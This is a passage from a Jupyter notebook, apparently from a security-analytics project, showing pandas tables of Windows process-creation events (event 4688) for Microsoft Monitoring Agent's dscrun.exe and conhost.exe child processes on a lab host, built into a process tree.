c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.26300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:02:56.263MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xe34...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/671004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.24700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.247MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x53c...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/761004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xef4...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/781004
c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:52:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xcd8...NaNNaNNaN1970-01-01c:\\program files\\microsoft monitoring agent\\ag...FalseFalseTrue1004/81004
\n

12 rows × 35 columns

\n
", "text/plain": " TenantId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\program files\\microsoft monitoring agent\\age... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n\n Account \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP\\MSTICAlertsWin1$ \n\n EventID \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \nc:\\program files\\microsoft monitoring agent\\age... 4688 \n\n TimeGenerated \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260 \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260 \n\n Computer \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1 \n\n SubjectUserSid \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \nc:\\program files\\microsoft monitoring agent\\age... S-1-5-18 \n\n SubjectUserName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \nc:\\program files\\microsoft monitoring agent\\age... MSTICAlertsWin1$ \n\n SubjectDomainName \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \nc:\\program files\\microsoft monitoring agent\\age... WORKGROUP \n\n SubjectLogonId \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \nc:\\program files\\microsoft monitoring agent\\age... 0x3e7 \n\n NewProcessId ... \\\nproc_key ... \nc:\\program files\\microsoft monitoring agent\\age... 0x8dc ... \nc:\\program files\\microsoft monitoring agent\\age... 0xd74 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x6f8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x1fc0 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x10bc ... \nc:\\program files\\microsoft monitoring agent\\age... 0xb48 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xbd0 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x15c8 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xe34 ... \nc:\\program files\\microsoft monitoring agent\\age... 0x53c ... \nc:\\program files\\microsoft monitoring agent\\age... 0xef4 ... \nc:\\program files\\microsoft monitoring agent\\age... 0xcd8 ... \n\n source_index_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n ProcessId_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n NewProcessName_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \nc:\\program files\\microsoft monitoring agent\\age... NaN \n\n TimeGenerated_orig_par \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 \n\n parent_key \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \nc:\\program files\\microsoft monitoring agent\\age... c:\\program files\\microsoft monitoring agent\\ag... \n\n IsRoot IsLeaf IsBranch \\\nproc_key \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \nc:\\program files\\microsoft monitoring agent\\age... False False True \n\n path parent_index \nproc_key \nc:\\program files\\microsoft monitoring agent\\age... 1004/10 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/107 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/120 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/127 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/129 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/139 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/15 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/5 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/67 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/76 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/78 1004 \nc:\\program files\\microsoft monitoring agent\\age... 1004/8 1004 \n\n[12 rows x 35 columns]" }, "execution_count": 13, "metadata": {}, "output_type": "execute_result" } ], "persistentId": "56ffc00b-0809-4b5f-b6b9-bec57f7e8332", "text": "depth = full_tree[\"path\"].str.count(\"/\").max()\nfull_tree[full_tree[\"path\"].str.count(\"/\") == depth - 1]" }, "executionTime": "2019-12-13T20:43:57.423Z" }, { "cell": { "executionCount": 14, "executionEventId": "8679b1d9-3417-49db-8138-1b4374ca3939", "hasError": false, "id": "fc64ecac-8791-4324-87f4-7ebb47f5b1ef", "outputs": [ { "data": { "text/html": "
\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n
TenantIdAccountEventIDTimeGeneratedComputerSubjectUserSidSubjectUserNameSubjectDomainNameSubjectLogonIdNewProcessId...source_index_parProcessId_parNewProcessName_parTimeGenerated_orig_parparent_keyIsRootIsLeafIsBranchpathparent_index
proc_key
c:\\windows\\system32\\conhost.exe0x183c2019-02-09 21:02:56.27300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:02:56.273MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x183c...998.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 21:02:56.256999936c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/10/1110
c:\\windows\\system32\\conhost.exe0x21c82019-02-09 23:22:56.26700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:22:56.267MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x21c8...749.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 23:22:56.256999936c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/107/108107
c:\\windows\\system32\\conhost.exe0x1c242019-02-09 23:32:56.28000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 23:32:56.280MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1c24...883.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 23:32:56.260000000c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/120/121120
c:\\windows\\system32\\conhost.exe0x17a42019-02-10 00:02:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:02:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x17a4...549.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-10 00:02:56.256999936c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/127/128127
c:\\windows\\system32\\conhost.exe0x1c102019-02-10 00:12:56.26300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:12:56.263MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1c10...478.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-10 00:12:56.252999936c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/129/130129
c:\\windows\\system32\\conhost.exe0x235c2019-02-10 00:32:56.28700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-10 00:32:56.287MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x235c...553.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-10 00:32:56.270000128c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/139/140139
c:\\windows\\system32\\conhost.exe0x14682019-02-09 21:32:56.29000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 21:32:56.290MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1468...848.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 21:32:56.270000128c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/15/1615
c:\\windows\\system32\\conhost.exe0x12782019-02-09 20:32:56.28000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:32:56.280MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1278...850.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 20:32:56.260000000c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/5/65
c:\\windows\\system32\\conhost.exe0xbc2019-02-09 22:02:56.27700052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:02:56.277MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xbc...984.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 22:02:56.263000064c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/67/6867
c:\\windows\\system32\\conhost.exe0x18342019-02-09 22:32:56.26000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.260MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x1834...738.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 22:32:56.247000064c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/76/7776
c:\\windows\\system32\\conhost.exe0x15f42019-02-09 22:32:56.27300052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 22:32:56.273MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70x15f4...736.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 22:32:56.260000000c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/78/7978
c:\\windows\\system32\\conhost.exe0xfd42019-02-09 20:52:56.27000052b1ab41-869e-4138-9e40-2a4457f09bf0WORKGROUP\\MSTICAlertsWin1$46882019-02-09 20:52:56.270MSTICAlertsWin1S-1-5-18MSTICAlertsWin1$WORKGROUP0x3e70xfd4...887.00x864C:\\Program Files\\Microsoft Monitoring Agent\\Ag...2019-02-09 20:52:56.260000000c:\\program files\\microsoft monitoring agent\\ag...FalseTrueFalse1004/8/98
\n

12 rows × 35 columns

\n
", "text/plain": " TenantId \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 52b1ab41-869e-4138-9e40-2a4457f09bf0 \n\n Account \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... WORKGROUP\\MSTICAlertsWin1$ \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... WORKGROUP\\MSTICAlertsWin1$ \n\n EventID \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 4688 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 4688 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 4688 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 4688 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 4688 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 4688 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 4688 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 4688 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 4688 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 4688 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 4688 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 4688 \n\n TimeGenerated \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.273 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 2019-02-09 23:22:56.267 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 2019-02-09 23:32:56.280 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 2019-02-10 00:02:56.270 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 2019-02-10 00:12:56.263 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 2019-02-10 00:32:56.287 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 2019-02-09 21:32:56.290 \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 2019-02-09 20:32:56.280 \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 2019-02-09 22:02:56.277 \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 2019-02-09 22:32:56.260 \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 2019-02-09 22:32:56.273 \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 2019-02-09 20:52:56.270 \n\n Computer \\\nproc_key \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... MSTICAlertsWin1 \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... MSTICAlertsWin1 